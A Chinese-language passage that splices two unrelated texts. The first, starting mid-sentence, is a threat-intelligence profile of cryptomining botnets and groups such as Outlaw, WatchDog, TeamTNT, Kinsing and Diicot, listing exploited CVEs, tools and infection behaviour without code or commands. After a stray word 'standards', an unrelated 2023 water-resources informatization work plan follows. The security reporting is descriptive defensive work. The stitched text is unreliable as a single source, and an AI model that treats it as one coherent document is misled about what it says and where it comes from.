Confluence漏洞和配置错误的Docker容器。该组织曾使用Tsunami恶意软件、XMRig加密挖矿程序、masscan和spirit等工具。最近的攻击中,研究人员观察到他们利用了CVE-2017-3506漏洞对Oracle WebLogic进行攻击。这个漏洞影响了Oracle WebLogic的WLS安全组件,攻击者可以利用特定的XML文档通过远程的HTTP请求来执行任意命令,从而获取对敏感数据的未经授权访问或者入侵整个系统[3]。 4.2 Outlaw Outlaw挖矿僵尸网络最早于2018年被发现,主要针对云服务器实施挖矿攻击,持续活跃。疑似来自罗马尼亚,最早由趋势科技将其命名为Outlaw,中文译文为“亡命徒”。该挖矿僵尸网络首次被发现时,攻击者使用Perl脚本语言的后门程序构建机器人,因此被命名为“Shellbot”。其主要传播途径是SSH暴力破解攻击目标系统并写入SSH公钥,以达到长期控制目标系统的目的,同时下载基于Perl脚本语言编写的后门和开源门罗币挖矿木马。 4.2.1 组织概览 表4-2 Outlaw挖矿僵尸网络介绍 组织名称 Outlaw 组织介绍 一个通过漏洞利用和SSH暴力破解传播基于Perl语言编写的Shellbot而组建的僵尸网络,后期开始投放挖矿木马获利 首次披露时间 2018年11月1日 首次披露厂商 趋势科技 归属国家 疑似罗马尼亚 命名原因 源自罗马尼亚语haiduc的翻译,该组织主要使用的黑客工具Haiduc 威胁类型 僵尸网络、挖矿木马 针对目标 Linux、IoT 传播途径 Shellshock(CVE-2014-7169)漏洞、Drupalgeddon2漏洞(CVE-2018-7600)漏洞和SSH暴力破解,主要采用后者,漏洞利用只在初期使用过 组织组件 隐藏进程工具(XHide)、SSH暴力破解工具(Haiduc、ps、tsm)、Shellbot程序、挖矿木马(XMRig) 版本迭代 该僵尸网络样本共有5个版本迭代,主要区别在于功能的新增,破解工具替换,破解工具功能的变化上 4.2.2 典型案例 ● 典型挖矿家族系列分析一丨Outlaw(亡命徒)挖矿僵尸网络 Outlaw挖矿僵尸网络首次被发现于2018年11月,当时其背后的攻击者只是一个通过漏洞入侵IoT设备和Linux服务器并植入恶意程序组建僵尸网络的组织,主要从事DDoS攻击活动,在暗网中提供DDoS出租服务。在后续的发展过程中,受虚拟货币升值影响,也逐步开始在僵尸网络节点中植入挖矿木马,并利用僵尸网络对外进行渗透并扩张,获得更大规模的计算资源,旨在挖矿过程中获取更多的虚拟货币速配[4]。 ● Outlaw黑客组织重新浮出水面 2022年2月,研究人员发现了一起涉及恶意脚本和恶意软件的服务器入侵事件。通过识别的攻击特征(SSH密钥注释、恶意工具和脚本名称、目录结构),可以确定这次攻击与2018年TrendMicro发现的Outlaw黑客组织的攻击非常相似。Outlaw黑客组织最初在2018年瞄准汽车和金融行业,近期再次出现的活动证明了该组织从未停止活动并且与过去相比有所进化。Outlaw在过去曾针对欧洲进行广泛攻击,新出现的活动可能也是如此。调查还发现了攻击者的持续性手段,以及攻击者曾经使用的恶意工具,这些工具显示了Outlaw活动模式中的某种演进[5]。 4.3 WatchDog WatchDog挖矿组织自2019年1月被发现,得名于Linux守护进程watchdogd,主要利用暴露的Docker Engine API端点和Redis服务器发起攻击,并且可以快速的从一台受感染的机器转向整个网络。WatchDog挖矿程序由三部分组成,Go语言二进制集和一个bash或PowerShell脚本文件组成。这些二进制文件执行特定功能,其中之一是模拟Linux的watchdogd守护程序功能,以确保挖矿过程不会挂起、负载过载或意外终止。第二个Go二进制文件在提供了针对Linux或Windows系统的目标针对性操作功能后,下载了可配置的IP地址网段列表。最后,第三个Go二进制脚本将使用来自初始化的bash或PowerShell脚本的自定义配置,在Windows或Linux操作系统上启动一个挖矿操作。WatchDog使用Go二进制文件来执行不同操作系统上的操作,例如Windows和Linux,只要目标系统安装了Go语言平台。 4.3.1 组织概览 表4-3 WatchDog挖矿组织介绍 组织名称 WatchDog 出现时间 2019年1月 针对平台 Windows、Linux 传播方式 暴露的Docker Engine API端点 Redis服务器 利用的漏洞 CVE-2014-3120 CVE-2015-1427 CVE-2018-1273 …… 挖矿币种 门罗币(XMR) 4.3.2 典型案例 ● atchDog挖矿组织近期活动分析 2023年,安天CERT捕获了一批活跃的WatchDog挖矿组织样本,该组织主要利用暴露的Docker Engine API端点和Redis服务器发起攻击,并且可以快速的从一台受感染的机器转向整个网络。WatchDog挖矿组织自2019年1月开始被发现,至今仍然活跃。WatchDog挖矿组织主要利用暴露的Redis服务器发起攻击。在Windows端,首先会从放马服务器上下载名为“init.ps1”的PowerShell脚本,该脚本会分别下载挖矿程序进行挖矿、漏洞扫描程序进行扫描、守护进程对挖矿进程进行守护、脚本文件回传主机名及IP地址、exe文件添加管理员组等。在Linux端,会从放马服务器上下载名为“init.sh”的sh脚本,该脚本同样会下载Linux端的挖矿程序、漏洞扫描程序和守护进程,他们的功能与Windows端一样。另外,该脚本还具有以下功能:清空防火墙规则、清除日志、创建计划任务、结束安全产品、添加SSH公钥、结束竞品挖矿、横向移动和结束特定网络连接等[6]。 ● WatchDog随着新的多阶段挖矿攻击而演变 WatchDog挖矿组织正在开展一项新的挖矿活动,采用先进的入侵、蠕虫病毒传播和规避安全软件的技术。该挖矿组织的目标是暴露的Docker Engine API端点和Redis服务器,并且可以快速从一台受感染的机器转向整个网络。WatchDog通过使用开放端口2375破坏配置错误的Docker Engine API端点来发起攻击,使它们能够在默认设置下访问守护进程[7]。 4.4 TeamTNT TeamTNT挖矿组织最早于2019年被发现,主要针对Docker Remote API未授权访问漏洞、配置错误的Kubernetes集群和Redis服务暴力破解进行攻击。入侵成功后,窃取各类登录凭证并留下后门,主要利用目标系统资源进行挖矿并组建僵尸网络。经过近几年发展,该组织控制的僵尸网络规模庞大,所使用的攻击组件更新频繁,是目前针对Linux服务器进行挖矿的主要攻击组织之一。该组织疑似来自德国,其命名方式依据该组织最早使用teamtnt.red域名进行命名。 4.4.1 组织概览 表4-4 TeamTNT挖矿组织介绍 组织名称 TeamTNT 首次披露时间 2019年10月 归属国家 德国 命名原因 最早使用teamtnt.red域名 威胁类型 挖矿木马、后门 针对目标 JupyterLab、Docker、Kubernetes和Redis 传播途径 错误的配置和SSH凭证等 组织武器库 Tsunami、Rathole、Ezuri、Punk.py、libprocesshider、tmate、masscan、pnscan、ZGrab、Tiny Shell、Mimipy、BotB、Diamorphine、Docker Escape Tool等 组织擅长技术 扫描局域网端口、添加防火墙规则、删除其他竞争对手进程、创建持久性计划任务、窃取服务凭证、收集机器信息、Rootkit隐藏进程、部署挖矿程序和横向移动等 推特账户 HildeGard@TeamTNT@HildeTNT GitHub账户 hilde@TeamTNT HildeTeamTNT 托管网站 teamtnt.red 4.4.2 典型案例 ● 针对云原生环境的挖矿攻击活动 2023年7月,研究人员发现针对云原生环境的攻击活动,并发现了用于实施攻击的基础设施。该基础设施处于测试和部署的早期阶段,主要针对暴露的JupyterLab和DockerAPI进行攻击,以此传播Tsunami恶意软件,并进行进一步的云凭据劫持、资源劫持和蠕虫感染等攻击活动。对相关基础设施进行调查后,研究人员表示此次攻击活动可能与TeamTNT组织相关[8]。 ● 针对多个云服务平台进行挖矿攻击活动 研究人员发现,此前针对亚马逊网络服务(AWS)证书进行窃密的攻击者,在2023年6月期间在其工具中扩展了针对Azure和Google云平台的模块。研究人员认为此次攻击活动与TeamTNT组织相关联。研究人员在此次攻击活动中发现了标志性的shell脚本,并发现了使用Golang编写的恶意ELF文件。其中值得注意的一点是,攻击者在其脚本中新增了针对Azure和Google云平台的功能,虽然该函数没有被调用,但这表明这些功能正在积极开发中,并可能会被用于此后的攻击活动中[9]。 4.5 H2Miner H2Miner挖矿木马最早出现于2019年12月,爆发初期及此后一段时间该挖矿木马都是针对Linux平台,直到2020年11月后,开始利用WebLogic漏洞针对Windows平台进行入侵并植入对应挖矿程序。此外,该挖矿木马频繁利用其他常见Web组件漏洞,入侵相关服务器并植入挖矿程序。例如,2021年12月,攻击者利用Log4j漏洞实施了H2Miner挖矿木马的投放。 4.5.1 组织概览 表4-5 H2Miner挖矿组织介绍 组织名称 H2Miner/Kinsing 出现时间 2019年12月 针对平台 Windows、Linux 传播方式 漏洞利用 利用的漏洞 Looney Tunables特权升级漏洞 Apache ActiveMQ RCE漏洞(CVE-2023-46604) Apache Solr’s DataImportHandler (CVE-2019-0193) Redis未授权RCE Confluence未授权RCE(CVE-2019-3396) WebLogic RCE漏洞(CVE-2020-14882/14883) Log4j漏洞(CVE-2021-44228) …… 挖矿币种 门罗币(XMR) 4.5.2 典型案例 ● Kinsing组织利用Looney Tunables漏洞进行攻击活动 研究人员发现Kinsing组织正在尝试利用披露的名为Looney Tunables的Linux特权升级漏洞,以此入侵云环境。Kinsing组织会获取并执行额外的PHP漏洞利用,去混淆后发现是一个用于进一步攻击活动的JavaScript恶意代码。该JavaScript代码是一个Web Shell,允许攻击者获得服务器的后门访问权限,从而能够执行文件管理、命令执行,并收集有关运行在上面的机器的更多信息。与Kinsing组织以往部署恶意软件和挖矿木马的攻击模式不同,此次攻击的最终目标似乎是窃取与云服务提供商相关的凭据数据[10]。 ● Kinsing组织利用CVE-2023-46604漏洞进行攻击活动 Kinsing组织正在利用Apache ActiveMQ RCE漏洞(CVE-2023-46604)进行攻击活动,该组织在易受攻击的系统上执行挖矿程序和恶意软件。在启动挖矿程序之前,Kinsing通过终止任何相关进程、crontabs和网络连接来检查机器上是否有其他的Monero挖矿程序。之后,它通过cronjob建立持久性,该cronjob用于获取其感染脚本的最新版本,并将rootkit添加到/etc/ld.so.preload中[11]。 4.6 Sysrv-hello Sysrv-hello挖矿木马于2020年12月31日被首次披露,通过漏洞传播,无针对性目标,蠕虫样本更新频繁,是一个活跃在Windows和Linux的双平台挖矿蠕虫。根据其近两年的活动,可将其发展分为三个阶段:前期尝试传播、中期扩大传播和后期注重防御规避并维持传播力度。从三个阶段的样本分析看,其背后黑产组织并不重视维持对目标主机的访问权限,只在中期和后期的Redis漏洞利用中添加了在目标系统中植入SSH公钥的功能;其更加注重收益,尽可能扩展和维持传播能力,由于其后期矿池连接方式采用矿池代理,无法获取其全面的收益情况,但在2021年3月份期间平均每两天收益一个门罗币,按当时市价,即平均每天收益100美元。 4.6.1 组织概览 表4-6 Sysrv-hello挖矿组织介绍 组织名称 Sysrv-hello 首次披露时间 2020年12月31日 命名原因 捕获的大量样本原始文件名以“sysrv“字符串为主,且样本内使用的函数或模块路径中均包含“hello”字符串。 威胁类型 挖矿、蠕虫 针对目标 无特殊针对目标、蠕虫传播目标随机化,针对包括云主机在内的目标 传播方式 漏洞利用、暴力破解、受害主机上存储的SSH私钥 传播组件 Laravel Debug mode RCE (CVE-2021-3129) XXL-JOB executor 未授权访问漏洞 Jenkins RCE漏洞(CVE-2018-1000861) Jupyter 未授权访问漏洞 Nexus Repository Manager 3 RCE漏洞 (CVE-2019-7238) ThinkPHP5 RCE漏洞 WebLogic RCE漏洞(CVE-2020-14882) Hadoop YARN REST API未授权漏洞 Supervisord RCE漏洞(CVE-2017-11610) Wordpress-XMLRPC暴力破解 JBOOS反序列化漏洞(CVE-2017-12149) SSH弱口令暴力破解 PostgreSQL RCE漏洞(CVE-2019-9193) Tomcat弱口令暴力破解 Confluence未授权RCE漏洞(CVE-2019-3396) Redis弱口令暴力破解 Apache Struts2 RCE漏洞(CVE-2017-5638) Nexus弱口令暴力破解 PHPUnit RCE漏洞(CVE-2017-9841) Jupyter弱口令暴力破解 Spring Cloud Gateway Actuator RCE漏洞 (CVE-2022-22947 ) Jenkins弱口令暴力破解 GitLab CE/EE RCE漏洞(CVE-2021-22205) MySQL弱口令暴力破解 4.6.2 典型案例 ● 典型挖矿家族系列分析三 | Sysrv-Hello挖矿蠕虫 Sysrv-hello是一个利用多种漏洞传播的Windows和Linux双平台挖矿蠕虫,主要目的在于传播挖矿蠕虫,继而实现挖矿获利。该挖矿蠕虫于2020年12月31日被首次披露,由于捕获的大量样本原始文件名以“sysrv”字符串为主,且样本内使用的函数或模块路径中均包含“hello”字符串,研究人员将其命名为Sysrv-hello。Sysrv-hello挖矿蠕虫传播的文件主要有核心脚本、蠕虫母体及挖矿程序。其中核心脚本文件类型有Shell和PowerShell,主要承担下载并执行蠕虫,Linux脚本功能包括结束竞品、防御规避、持久化、横向传播等功能,PowerShell脚本更聚焦在防御规避和持久化上;蠕虫母体是由Golang语言编写,利用各种漏洞进行核心脚本的传播,进而实现自身的间接传播;挖矿程序负责劫持目标主机计算资源以此实施挖矿,该程序主要通过蠕虫母体释放并执行,但存在一段时间由核心脚本负责下载和执行[12]。 4.7 libgcc_a 2023年,安天CERT接到多起挖矿木马应急响应事件,经过排查发现,多起应急响应事件均与libgcc挖矿木马有关,该挖矿木马在Linux系统上主要以SSH暴力破解进行传播,在Windows系统上主要以RDP暴力破解进行传播。挖矿木马在感染受害主机后,还会进行横向传播进一步感染网内其他主机。利用多种防御手段进行反检测,如会采用开源rootkit工具r77-rootkit,这个工具具有ring 3隐藏功能,可以隐藏文件、目录、进程和CPU的使用情况、注册表项和值、服务、TCP和UDP连接、连接点、命名管道和计划任务等。另外攻击者使用开源门罗币挖矿程序XMRig进行挖矿,在Windows平台利用netpass工具读取本地明文RDP密码等。 4.7.1 组织概览 表4-7 Libgcc_a挖矿组织介绍 组织名称 libgcc_a/Warmup 出现时间 2023年 针对平台 Windows、Linux 传播方式 RDP暴力破解 SSH暴力破解 利用的漏洞 无 挖矿币种 门罗币(XMR) 4.7.2 典型案例 ● 揭露r77 Rootkit于XMRig挖矿程序联合部署 研究人员发现了一种恶意加密挖矿器,该挖矿器在亚洲多个国家部署。攻击者利用名为r77的开源用户态Rootkit。r77的主要目的是通过hooking重要Windows API来隐藏系统中其他软件的存在,这使其成为了进行隐秘攻击的理想工具。通过利用r77 Rootkit,恶意加密挖矿器的作者能够逃避检测并持续其攻击活动[13]。 4.8 Kthmimu Kthmimu挖矿木马主要通过Log4j 2漏洞进行传播。自Log4j 2漏洞曝光后,该木马挖矿活动较为活跃,同时向Windows与Linux双平台传播恶意脚本,下载门罗币挖矿程序进行挖矿。该挖矿木马在Windows平台上使用PowerShell脚本下载并执行门罗币开源挖矿程序XMRig。除此之外,该脚本还具有创建计划任务持久化、判断系统用户包含关键字符串和创建计划任务等功能。在Linux平台上,木马使用Shell脚本下载挖矿程序,并且该脚本还会清除具有竞争关系的其它挖矿程序、下载其它脚本和创建计划任务等功能。 4.8.1 组织概览 表4-8 Kthmimu挖矿组织介绍 组织名称 Kthmimu 出现时间 2022年3月 针对平台 Windows、Linux 传播方式 漏洞利用 利用的漏洞 Apache Log4j 2远程代码执行漏洞 挖矿币种 门罗币(XMR) 4.8.2 典型案例 ● 活跃的Kthmimu挖矿木马分析 自2022年3月以来,安天CERT陆续捕获到Kthmimu挖矿木马攻击样本,该木马主要通过Log4j 2漏洞进行传播。自Log4j 2漏洞曝光后,该木马挖矿活动较为活跃,同时向Windows与Linux双平台传播恶意脚本,下载门罗币挖矿程序进行挖矿[14]。 4.9 aminer 2023年6月,安天CERT通过捕风蜜罐系统捕获了一批活跃的挖矿木马样本,该挖矿木马主要利用SSH和Redis弱口令暴力破解对Linux平台进行攻击。由于其初始脚本中下载挖矿文件的名称为“aminer.gz”,因此安天CERT将该挖矿木马命名为“aminer”。 4.9.1 挖矿木马概览 表4-9 aminer挖矿木马介绍 挖矿木马名称 aminer 出现时间 2022年6月 活跃时间 2023年5月 针对平台 Linux 传播方式 SSH和Redis弱口令暴力破解 主要技术特点 持久化;irc后门;隐藏行为等 挖矿币种 门罗币(XMR) 4.9.2 典型案例 ● aminer挖矿木马活动分析 aminer挖矿木马初始攻击脚本实际由一连串指令组成,其中包括写入指定DNS服务器地址、使用yum包管理器安装一系列工具和库、下载install.tgz文件解压后执行install脚本、下载ns2.jpg文件内存执行、下载aminer.gz文件解压后执行start脚本进行挖矿。install.tgz文件中包含很多与系统文件重名的恶意文件,如top等。这些文件均由install脚本调用,主要功能包括添加SSH公钥、替换系统文件如top、netstat、crontab等、执行irc客户端建立后门、过滤端口号为20和43的网络连接等。ns2.jpg实际为Perl语言编写的脚本文件,用于实现ShellBot功能。运行后会连接irc服务器,端口号为20。aminer.gz压缩包中包含针对两种操作系统架构的挖矿程序,start脚本执行后会根据当前受害者的操作系统架构决定使用哪个挖矿程序,创建一个服务进行持久化,最后执行挖矿程序进行挖矿[15]。 4.10 Diicot Diicot挖矿组织(也称color1337、Mexals),以互联网下暴露22端口的设备作为攻击目标,使用SSH暴力破解工具实施入侵。成功后,根据设备CPU性能,利用托管网站下发不同载荷。当设备性能较弱时,从托管网站下载相应工具和脚本,实施扫描和暴力破解进行传播;当设备性能较强时,下载挖矿程序进行挖矿。 4.10.1 组织概览 表4-10 Diicot挖矿组织介绍 组织名称:Diicot 出现时间:2022年10月 针对平台:Linux 传播方式:SSH暴力破解 挖矿币种:门罗币(XMR) 技术特点:主动扫描22端口;SHC加密;清除和创建定时任务;更改root账户密码;结束竞品程序;执行挖矿程序;SSH暴力破解; 4.10.2 典型案例 ● Diicot挖矿组织近期攻击活动分析 2023年6月,国家计算机网络应急技术处理协调中心(CNCERT/CC)和安天联合监测发现Diicot挖矿组织(也称color1337、Mexals)频繁发起攻击活动,境内受害服务器多达600余台。通过对攻击者使用的C2资源进行分析发现,攻击者于2022年10月13日至2023年5月27日期间不断更新攻击载荷,增加shc加密等手法以达成免杀的目的。跟踪监测发现2023年3月1日至今,境内受害服务器(以 IP 数计算)累计600余台[16]。
standards
2023年水利网信工作要点   2023年水利网信工作的总体思路是:坚持以习近平新时代中国特色社会主义思想为指导,深入学习贯彻党的二十大精神,坚持习近平总书记“节水优先、空间均衡、系统治理、两手发力”治水思路,全面落实习近平总书记治水重要论述精神、关于网络强国的重要思想,全面落实全国水利工作会议精神,按照“需求牵引、应用至上、数字赋能、提升能力”要求,统筹数字孪生流域、数字孪生水网、数字孪生工程建设,加强先行先试和示范引领,加快构建具有“四预”(预报、预警、预演、预案)功能的数字孪生水利体系,守牢水利网络安全底线,为新阶段水利高质量发展提供强力驱动和有力支撑。   一、大力构建数字孪生流域   1.构建水利部本级数字孪生平台。持续完善全国水利一张图,更新发布全国陆域满覆盖2米分辨率正射影像图,持续更新水库、水闸、堤防、蓄滞洪区等工程基础数据,实时接入水雨情、工情、墒情等监测数据,扩展经济社会等跨行业数据,支撑数字化映射。推进气象、水文及水动力学耦合的“降水-产流-汇流-演进”模型建设,开展洪水预报模型参数在线率定,扩展河湖遥感智能识别模型库,集成流域产汇流、土壤侵蚀、泥沙、地下水等模型研究成果,支撑智能化模拟。面向流域防洪抗旱、水资源管理与调配等典型业务场景,推进预报调度方案、业务规则、历史场景、专家经验等专业知识建设,进一步提升精准化决策支撑能力。   2.完善水利部本级信息化基础设施。继续扩充水利部一级水利云,建成不少于50万亿次双精度浮点高性能算力资源并投入应用。推进北斗水利行业应用,组织完成北斗水利综合应用示范项目建设。推进水利测雨雷达系统建设与应用。开展以水利部作为第一主用户的陆地水资源卫星工程立项。深化水利蓝信应用,提升蓝信+用户体验。强化视频会议保障能力,规范操作规程,开展外事视频会议系统建设和水旱灾害防御视频会商系统改造。   3.推进水利部数字孪生安全监控感知预警能力项目建设。以提升小水库安全运行预警能力为目标,建设部级小型水库雨水情监测平台、大坝安全监测平台,优化提升视频级联集控平台,构建小水库无人机监测共享服务平台,建设水库安全运行专题数据管理平台,实现水库基础信息、雨水情及视频监测信息、无人机动态监测信息汇集与服务,开发小水库安全风险识别及预警功能。   4.持续推进数字孪生长江建设。开展数字孪生长江试点数据成果集成,推进数据底板建设。开展数字孪生国产化运行环境研究,推进运行环境设计与实施。推进汉江流域、澧水流域具有“四预”功能的水资源管理与调配业务应用系统建设。不断深化“四预”功能,拓展“2+N”水利业务应用广度深度。   5.持续推进数字孪生黄河建设。完善黄河一张图和基础数据,构建三门峡—入海口典型区域多维多要素数字孪生场景,加快流域泥沙模型、产汇流及洪水预报模型等水利通用模型研发,探索构建防汛调度业务为主的黄河知识图谱和知识平台,升级黄河水旱灾害防御、水资源管理与节约保护应用系统,构建综合业务应用系统。   6.持续推进数字孪生淮河建设。进一步补充数字孪生淮河(干流出山店水库—王家坝河段)重点河段重点区域的L2级数据底板,完善分布式模型与水动力学模型。推进王临段、洪汝河治理等在建工程数字孪生建设前期工作。开展数字孪生淮河蚌浮段、数字孪生沂沭河上中游建设,基本完成蚌埠至浮山段防洪“四预”和水资源管理“四预”应用系统建设。   7.持续推进数字孪生海河建设。深入开展流域数据治理,完善海河流域水利一张图1.0并推广应用。初步搭建模型管理平台,开展模型库建设。强化数据安全防护,建设数据安全基础防护设施,加大密码技术应用,优化完善防洪、水资源管理系统“四预”平台,扩展完善N项业务专题应用。初步建成数字孪生永定河2.0。   8.持续推进数字孪生珠江建设。基本构建西江等流域重点河段L2级数据底板、模型平台和知识平台,提升信息化基础设施支撑保障能力。继续完善珠江水旱灾害防御“四预”平台,推进水资源管理与调配系统建设,基于珠江水利一张图新建或拓展完善水政执法、节约与保护管理、河湖管理、工程运行管理、水土保持等业务应用。   9.持续推进数字孪生松辽建设。继续完善嫩江、洮儿河,胖头泡、月亮泡蓄滞洪区重点区域L2级数据底板,完成重点防洪区倾斜摄影数据采集、重要闸口BIM模型L3级数据底板建设,集成数字孪生尼尔基相关成果,补充水利数据资源。完善模型库,重点完成宽浅型河道洪水演进模型建设与应用,构建知识库。完成全景数字嫩江平台搭建,完善防洪“四预”功能,应用于2023年防洪调度演练。推进新型监测技术手段应用,扩展水利云。   10.持续推进数字孪生太湖建设。进一步完善太浦河数据底板、太湖水量水质模型、知识平台等,实现与业务应用深度融合。继续完善太湖流域多目标统筹调度“四预”一体化系统、太湖流域水资源管理与调配应用系统、防洪规划数字信息平台、水政执法巡查监控系统等。积极谋划推进长三角一体化数字太湖工程前期工作。   二、推进建设数字孪生水网   11.推进数字孪生南水北调工程建设。组织编制数字孪生南水北调建设有关技术标准。完成数字孪生南水北调工程先行先试建设任务,加快推进数字孪生南水北调工程初步设计,研究提出数字孪生南水北调1.0版指标体系。   12.推进数字孪生省级水网建设。将数字孪生水网建设内容纳入省级水网建设方案,力争广东、浙江、山东、江西、湖北、辽宁、广西等第一批省级水网先导区数字孪生水网建设取得标志性成果,并应用于水量调度等实际工作。积极推进市县级数字孪生水网建设。   三、加快建设数字孪生工程   13.基本建成数字孪生三峡。推进数字孪生三峡数据底板、模型库及知识库建设,搭建数字孪生三峡平台,初步实现三峡防洪“四预”、重点河段“智慧巡库”、枢纽安全智能巡检、重点项目智能管控等功能,基本建成统一支撑、多级部署、多户共享的数字孪生三峡1.0版。   14.基本建成数字孪生丹江口。完善升级监测感知网,提高模型精度,建设大坝、防洪、供水、水质、库区安全等“四预”智能应用,分模块开展试用,推动业务应用迭代升级。   15.基本建成数字孪生江垭、皂市。完成江垭工程水雨情遥测设施升级改造,完善数据底板、模型库、知识库和孪生引擎,优化工程安全分析预警、防洪兴利调度业务应用,开发生产运营管理、库区巡查、综合决策支持业务应用。巩固提升数字孪生皂市建设成果。   16.基本建成数字孪生小浪底。持续丰富算据,完善小浪底和西霞院工程数据底板,构建模型库和知识平台,进一步丰富和优化算法模型,建成小浪底集控中心。开发完善防汛调度、泥沙冲淤、工程安全、库区管理等“四预”功能。结合建设情况编制有关技术标准。   17.基本建成数字孪生万家寨。补充完善数据底板,完成BIM模型二期建设,强化参数率定和测试应用,持续验证完善算法模型,加大算力支持和技术攻关,进一步提升模拟仿真能力。深化系统开发,迭代优化防洪防凌、工程安全“四预”功能。   18.基本建成数字孪生南四湖二级坝。对数据底板、水利模型、知识库等持续优化和完善,复盘场次洪水,持续率定水利模型参数,校验“四预”系统。结合数字孪生沂沭河建设,进一步充实完善工程运行管理系统。   19.基本建成数字孪生岳城。完成防洪“四预”系统模型参数复核校验、预报方案更新,完善知识图谱,进一步完善防洪“四预”系统功能,开展水资源管理与调配相关业务建设,强化网络安全防护。   20.基本建成数字孪生大藤峡。完善数据底板、模型库、知识库和可视化平台,上线库区岸线空天地立体监管系统、安全生产管理系统,迭代升级防洪与水量调度“四预”平台、工程安全风险与健康评估系统,强化数字孪生业务应用,构建大藤峡智能应用体系。   21.基本建成数字孪生尼尔基。完善水利工程实体场景,补充视频监控点,完善数字孪生计算存储环境,建设会商中心。加强网络安全管理手段,提升网络安全管理效能。初步建设工程安全智能分析预警系统。   22.基本建成数字孪生太浦闸。继续提升算据、算法、算力和工程“四预”能力,开展网络安全建设,补充完善资源共建共享,开展数字孪生太浦闸安全运行算法模型研究与完善。   四、着力推进水利业务应用   23.升级完善流域防洪业务应用。建成多源空间信息融合的洪水预报平台和高精度河流水系分区水雨情预报模型,在水利部本级实现业务运行。推进水利部本级流域防洪“四预”先行先试样板建设,以黄河“四库”和珠江流域西江大藤峡水库为示范区域,实现流域防洪“四预”功能。推进七大江河流域防洪业务应用。   24.推进抗旱“四预”工作。完成全国旱情监测预警综合平台建设,持续推进“旱情一张图”制作,推动干旱综合评估指标体系和定期旱情分析常态化工作机制建设,完善气象、水文、农业等干旱网格化多元评估产品,定期评估全国旱情发展趋势,提升旱情综合评估能力。   25.整合扩展水资源管理与调配业务“四预”应用。优化完善部本级(含流域)取用水平台,推进省级平台整合应用和数据共享,推进“一网通办”“一网统管”和智慧监管。进一步完善取用水监管和分析应用数据产品,开展取用水总量、地下水开采量、水位耦合动态分析研究。持续优化完善重点河湖生态流量监管全流程业务应用,实现140条河流230个断面生态流量监测预警。推进农业实际灌溉面积、种植结构、取水工程、河湖生态用水等遥感图斑解译与监管应用,提升水资源监管能力。继续建设重要江河流域水资源调度、跨流域重大引调水工程调度平台,开发调水管理专业模型、知识图谱和预案库等模块,支撑水资源统一调度工作。   26.推进地下水超采监管。做好国家地下水监测工程运行维护和地下水水质监测工作,持续提升地下水超采区水位变化通报和地下水水位管控预警支撑能力,完成京杭大运河南运河段地下水数字流场构建,推进地下水数值模型应用,试点提出区域地下水预报通用模型。   27.完善水利工程建设与运行管理应用。推进BIM技术在水利工程全生命周期运用,全面管控致险、承险、防险要素。加快水库运管系统升级迭代,整合水库运管系统与水库大坝注册登记系统。建设堤防水闸运行管理信息系统。持续开展小型水库安全监测能力提升试点。全面推广使用大中型水库除险加固、中小型水库建设项目管理系统。搭建主要支流和中小河流治理项目建设管理信息系统。   28.升级完善河湖管理应用。持续优化完善全国河湖长制管理信息系统,做好清“四乱”督查、监督检查、年度考核、河湖健康档案填报支撑,实现部、省级系统数据同步,复核第一次全国水利普查河湖名录,提升河湖管理基础数据质量。推进河湖遥感平台解译及应用,建立常态化工作机制,支撑地方全面核查遥感解译图斑,逐步形成合法地物图斑本底数据集,结合最新时相卫星遥感影像定期排查新增重点地物。推进河湖管理范围、岸线功能分区、涉河建设项目审批信息上图。在重点河湖开展AI业务化试点应用。   29.升级扩展水土保持应用。持续扩展水土保持业务应用。印发水土保持数字化场景建设与集成技术方案,推进水土保持数字化场景建设,继续开展全国水土保持信息管理系统业务功能和模块升级改造,初步实现水土保持业务全流程数字化。   30.整合扩展农村水利水电应用。加快推进数字孪生供水工程建设,打造智慧供水样板。完善全国大中型灌区管理信息数据指标体系,完善大中型灌区一张图。指导实施数字孪生灌区先行先试,尽快形成一批可复制可推广成果。持续推进小水电数据互联互通,将长江经济带小水电清理整改平台数据整合到农村水利水电信息管理系统,对绿色小水电管理信息系统实施国产化改造。   31.整合建设节水管理与服务系统。制定节水数据库表结构及标识符标准,设计开发节约用水社会服务APP。   32.建设统一的水利监督信息平台。优化完善水利监督信息系统,更新问题清单,完善督查、水利稽察子系统。开发水利工程质量监督系统。优化完善水利安全生产监管信息系统,新增水利安全生产标准化达标单位动态管理功能。进一步开展水利监督数据深度应用研究,将单项、综合考核评价模型嵌入督查工作平台,初步实现线上评价考核。   33.扩展完善水文管理应用。持续完善全国水文站网管理系统,加快完善汇交管理平台功能,开展水文监测资料汇交。围绕实施最严格水资源管理制度考核对监测数据的需求,进一步完善全国省界和重要控制断面水文水资源监测系统功能。推进国家地下水监测二期工程前期工作。   34.扩展完善水利行政应用。持续完善综合办公应用,不断优化相关系统模块功能。持续推进水行政执法综合管理平台建设,编制水行政执法综合管理平台总体建设方案,选取典型省份开展平台数据汇聚试点。加强水库移民管理信息系统的运行管理。持续推进三峡对口支援信息管理系统建设,完善系统相关功能,完成历史数据迁移、业务数据填报汇总。   35.打造升级水利公共服务应用。推动水利政务服务数据资源与全国一体化政务服务平台的共享,完善水利部政务服务平台,推进政务服务事项“应上尽上、一网通办、掌上办”,实现跨省通办。做好“水利办”政务服务品牌管理和宣传推广,持续推进政务服务标准化规范化便利化。完善水利电子证照系统并推广应用。完善水利公共服务,强化水利部政府网站信息公开,加强水利部政府网站监督检查。建强管好网络新闻宣传阵地,强化水利舆情的全网智能搜集和大数据分析。   五、全力筑牢网络安全防线   36.常态化开展水利行业网络安全监管。对水利行业门户网站、有关单位互联网出口、水利业务网出口开展实时监测,对监测发现的问题进行通报整改,在“全国两会”“亚运会”等重要时期,组织水利行业开展网络安全专项保障。   37.强化关键信息基础设施保护。水利关键信息基础设施运营者依据水利关键信息基础设施有关指导意见及安全规划,制定年度保护计划,梳理台账及供应链清单,在采购设备及服务时,按照水利关键信息基础设施风险预判指南及时开展网络安全审查。   38.开展网络安全监督。开展2023年水利行业网络安全攻防演练,组织行业内有技术实力的单位和专业机构,以水利关键信息基础设施、门户网站、重要数据、工控系统为重点,通过互联网开展攻击测试,及时发现网络安全风险隐患并督促整改,对问题较为突出的单位进行现场检查。   39.加强数据安全管理。组织开展数据资产梳理,动态更新水利重要数据目录,加强数据安全管理,落实数据处理过程数据管理责任,规范数据使用和流动环节管理,推动数据风险评估及安全监测。   